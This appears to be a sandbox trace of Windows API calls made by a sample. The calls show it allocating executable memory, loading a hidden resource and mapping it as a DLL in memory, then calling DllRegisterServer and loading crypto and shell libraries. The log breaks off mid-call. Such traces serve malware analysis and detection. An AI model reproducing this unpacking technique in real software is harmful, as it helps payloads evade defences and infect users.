FreeEnvironmentStringsW (penv=0x5c6d40) returned 1 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x118) returned 0x5bff20 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1f) returned 0x5b46f0 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2e) returned 0x5b8e80 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x31) returned 0x5b8980 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3c) returned 0x5b7fd0 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x31) returned 0x5b89c0 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x14) returned 0x5b2c00 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5b4720 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xd) returned 0x5b2b40 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1d) returned 0x5b47b0 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x31) returned 0x5b8a80 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x15) returned 0x5b2c20 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x17) returned 0x5b2b00 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xe) returned 0x5b2d40 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa2) returned 0x5c7cc0 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3e) returned 0x5b75d0 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1d) returned 0x5b47e0 [0085.469] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x48) returned 0x5b73a0 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x12) returned 0x5b2b60 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b2a20 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1b) returned 0x5b4870 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1e) returned 0x5b4810 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x29) returned 0x5b8a00 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1e) returned 0x5b4ab0 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x6b) returned 0x5c7ec0 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x17) returned 0x5b2c40 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xf) returned 0x5b2ac0 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x16) returned 0x5b2b80 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2a) returned 0x5b8a40 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x29) returned 0x5b8e00 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x12) returned 0x5b2ba0 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x21) returned 0x5b4c00 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x16) returned 0x5b2d80 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x22) returned 0x5b4840 [0085.470] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x12) returned 0x5b2ae0 [0085.471] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5c7790 | out: hHeap=0x5a0000) returned 1 [0085.471] CoInitialize (pvReserved=0x0) returned 0x1 [0085.471] CoTaskMemAlloc (cb=0x5f5e16f) returned 0x1e5d040 [0088.056] VirtualAlloc (lpAddress=0x0, dwSize=0xb9d, flAllocationType=0x3000, flProtect=0x40) returned 0x4b0000 [0088.057] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.057] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.057] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.057] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.057] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.057] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.057] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.057] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.057] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.057] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.058] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.059] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.060] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.061] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.062] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.063] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.063] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.063] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.063] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.063] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.063] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.063] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.063] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.064] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.064] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.064] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.064] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.064] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.064] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.064] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.064] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.065] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.066] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.067] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.068] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.069] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.070] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.071] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.072] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0 [0088.113] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32.dll", BaseAddress=0xcd5a0 | out: BaseAddress=0xcd5a0*=0x7ffe954a0000) returned 0x0 [0088.114] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0xcd670 | out: ProcedureAddress=0xcd670*=0x7ffe954c28c0) returned 0x0 [0088.114] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0xcd6a0 | out: ProcedureAddress=0xcd6a0*=0x7ffe954c3a90) returned 0x0 [0088.114] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="FlushInstructionCache", Ordinal=0x0, ProcedureAddress=0xcd6a8 | out: ProcedureAddress=0xcd6a8*=0x7ffe954c0c70) returned 0x0 [0088.114] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="GetNativeSystemInfo", Ordinal=0x0, ProcedureAddress=0xcd6e8 | out: ProcedureAddress=0xcd6e8*=0x7ffe954c8a00) returned 0x0 [0088.114] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="Sleep", Ordinal=0x0, ProcedureAddress=0xcd690 | out: ProcedureAddress=0xcd690*=0x7ffe954bb7b0) returned 0x0 [0088.114] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="RtlAddFunctionTable", Ordinal=0x0, ProcedureAddress=0xcd6f0 | out: ProcedureAddress=0xcd6f0*=0x7ffe954c6a10) returned 0x0 [0088.114] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0xcd698 | out: ProcedureAddress=0xcd698*=0x7ffe954c74d0) returned 0x0 [0088.115] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="FindResourceW", Ordinal=0x0, ProcedureAddress=0xcd6c0 | out: ProcedureAddress=0xcd6c0*=0x7ffe954c69f0) returned 0x0 [0088.115] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="LoadResource", Ordinal=0x0, ProcedureAddress=0xcd6c8 | out: ProcedureAddress=0xcd6c8*=0x7ffe954c3e60) returned 0x0 [0088.115] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="SizeofResource", Ordinal=0x0, ProcedureAddress=0xcd6d0 | out: ProcedureAddress=0xcd6d0*=0x7ffe954c4460) returned 0x0 [0088.115] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="LockResource", Ordinal=0x0, ProcedureAddress=0xcd6d8 | out: ProcedureAddress=0xcd6d8*=0x7ffe954c4450) returned 0x0 [0088.115] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="FreeResource", Ordinal=0x0, ProcedureAddress=0xcd6e0 | out: ProcedureAddress=0xcd6e0*=0x7ffe954c8ee0) returned 0x0 [0088.115] FindResourceW (hModule=0x1dc0000, lpName=0x1a11, lpType=0x17) returned 0x1de6110 [0088.115] LoadResource (hModule=0x1dc0000, hResInfo=0x1de6110) returned 0x1df6970 [0088.115] SizeofResource (hModule=0x1dc0000, hResInfo=0x1de6110) returned 0x57600 [0088.115] LockResource (hResData=0x1df6970) returned 0x1df6970 [0088.115] VirtualAlloc (lpAddress=0x0, dwSize=0x57600, flAllocationType=0x3000, flProtect=0x40) returned 0x520000 [0088.141] FreeResource (hResData=0x1df6970) returned 0 [0088.141] GetNativeSystemInfo (in: lpSystemInfo=0xcd700 | out: lpSystemInfo=0xcd700*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0088.141] VirtualAlloc (lpAddress=0x180000000, dwSize=0x5a000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0088.141] VirtualAlloc (lpAddress=0x0, dwSize=0x5a000, flAllocationType=0x3000, flProtect=0x4) returned 0x1e50000 [0088.150] VirtualProtect (in: lpAddress=0x1e51000, dwSize=0x29000, flNewProtect=0x20, lpflOldProtect=0xcd788 | out: lpflOldProtect=0xcd788*=0x4) returned 1 [0088.155] VirtualProtect (in: lpAddress=0x1e7a000, dwSize=0xa00, flNewProtect=0x2, lpflOldProtect=0xcd788 | out: lpflOldProtect=0xcd788*=0x4) returned 1 [0088.155] VirtualProtect (in: lpAddress=0x1e7c000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0xcd788 | out: lpflOldProtect=0xcd788*=0x4) returned 1 [0088.155] VirtualProtect (in: lpAddress=0x1e7d000, dwSize=0x2c800, flNewProtect=0x2, lpflOldProtect=0xcd788 | out: lpflOldProtect=0xcd788*=0x4) returned 1 [0088.155] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x0, dwSize=0x0) returned 1 [0088.155] RtlAddFunctionTable (FunctionTable=0x1e7c000, EntryCount=0x139, BaseAddress=0x1e50000, TargetGp=0x7ffe954c6a10) returned 1 [0088.159] SetErrorMode (uMode=0x0) returned 0x1 [0088.159] GetProcAddress (hModule=0x1dc0000, lpProcName="DllRegisterServer") returned 0x1dc19a0 [0088.161] GetProcessHeap () returned 0x5a0000 [0088.162] GetModuleHandleA (lpModuleName="NTDLL") returned 0x7ffe97fe0000 [0088.162] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x58) returned 0x5c1200 [0088.163] GetProcessHeap () returned 0x5a0000 [0088.163] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x20) returned 0x5b4930 [0088.163] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x7ffe97600000 [0088.164] GetProcessHeap () returned 0x5a0000 [0088.165] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4930 | out: hHeap=0x5a0000) returned 1 [0088.165] GetProcessHeap () returned 0x5a0000 [0088.165] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b2d60 [0088.165] LoadLibraryW (lpLibFileName="bcrypt.dll") returned 0x7ffe94490000 [0088.165] GetProcessHeap () returned 0x5a0000 [0088.165] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2d60 | out: hHeap=0x5a0000) returned 1 [0088.166] GetProcessHeap () returned 0x5a0000 [0088.166] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b2bc0 [0088.166] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x7ffe951c0000 [0088.176] GetProcessHeap () returned 0x5a0000 [0088.176] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2bc0 | out: hHeap=0x5a0000) returned 1 [0088.177] GetProcessHeap () returned 0x5a0000 [0088.177] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b2da0 [0088.177] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7ffe95e70000 [0088.177] GetProcessHeap () returned 0x5a0000 [0088.177] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2da0 | out: hHeap=0x5a0000) returned 1 [0088.177] GetProcessHeap () returned 0x5a0000 [0088.177] RtlAllocateHeap (HeapHandle=0x5a0000, 